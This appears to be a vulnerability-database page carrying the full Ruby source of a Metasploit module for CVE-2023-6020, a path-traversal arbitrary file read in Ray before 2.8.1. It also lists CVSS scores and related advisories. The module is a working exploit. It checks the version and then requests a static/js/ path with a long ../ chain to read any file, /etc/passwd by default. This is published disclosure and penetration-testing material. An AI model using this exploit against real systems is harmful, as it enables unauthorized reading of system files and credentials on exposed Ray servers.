Lucene search
Byt3bl33d3r <[email protected]>, danmcinerney <[email protected]>, Takahiro YokoyamaMSF:AUXILIARY-GATHER-RAY_LFI_CVE_2023_6020-HistoryAug 08, 2024 - 11:51 p.m.
Ray static arbitrary file read
2024-08-0823:51:14
byt3bl33d3r <[email protected]>, danmcinerney <[email protected]>, Takahiro Yokoyama
www.rapid7.com
11
metasploit module
ray
arbitrary file read
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
6.7
Confidence
Low
EPSS
0.405
Percentile
97.3%
Ray before 2.8.1 is vulnerable to a local file inclusion.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Ray static arbitrary file read',
'Description' => %q{
Ray before 2.8.1 is vulnerable to a local file inclusion.
},
'Author' => [
'byt3bl33d3r <[email protected]>', # Python Metasploit module
'danmcinerney <[email protected]>', # Python Metasploit module
'Takahiro Yokoyama' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-6020'],
['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'],
['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray']
],
'DisclosureDate' => '2023-11-15',
'Notes' => {
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ IOC_IN_LOGS, ],
'Reliability' => []
}
)
)
register_options(
[
Opt::RPORT(8265),
OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd'])
]
)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'api/version')
})
return Exploit::CheckCode::Unknown unless res && res.code == 200
ray_version = res.get_json_document['ray_version']
return Exploit::CheckCode::Unknown unless ray_version
return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')
file_content = lfi('/etc/passwd')
return Exploit::CheckCode::Vulnerable unless file_content.nil?
Exploit::CheckCode::Appears
end
def lfi(filepath)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{filepath}")
})
return unless res && res.code == 200
res.body
end
def run
file_content = lfi(datastore['FILEPATH'])
fail_with(Failure::Unknown, 'Failed to execute LFI') unless file_content
print_good("#{datastore['FILEPATH']}\n#{file_content}")
end
end
Related
cve
cve
prion
prion
Authentication flaw
2023-11-16 21:15:00
Authentication flaw
2023-11-16 17:15:00
Command injection
2023-11-16 17:15:00
cvelist
cvelist
CVE-2023-6020 Ray Static File Local File Include
2023-11-16 21:07:33
CVE-2023-6019 Ray Command Injection in cpu_profile Parameter
2023-11-16 16:12:07
CVE-2023-6021 Ray Log File Local File Include
2023-11-16 16:11:42
nuclei
nuclei
Ray Static File - Local File Inclusion
2023-12-05 16:15:41
packetstorm
packetstorm
Ray Static Arbitrary File Read
2024-08-31 00:00:00
nvd
nvd
github
github
Ray Missing Authorization vulnerability
2023-11-16 21:30:46
Ray Path Traversal vulnerability
2023-11-16 18:30:31
osv
osv
Ray Missing Authorization vulnerability
2023-11-16 21:30:46
Ray Path Traversal vulnerability
2023-11-16 18:30:31
thn
thn
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up 08/30/2024
2024-08-30 18:43:05
openvas
openvas
Generic HTTP Directory Traversal (Web Dirs) - Active Check
2021-07-22 00:00:00
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
6.7
Confidence
Low
EPSS
0.405
Percentile
97.3%
Related for MSF:AUXILIARY-GATHER-RAY_LFI_CVE_2023_6020-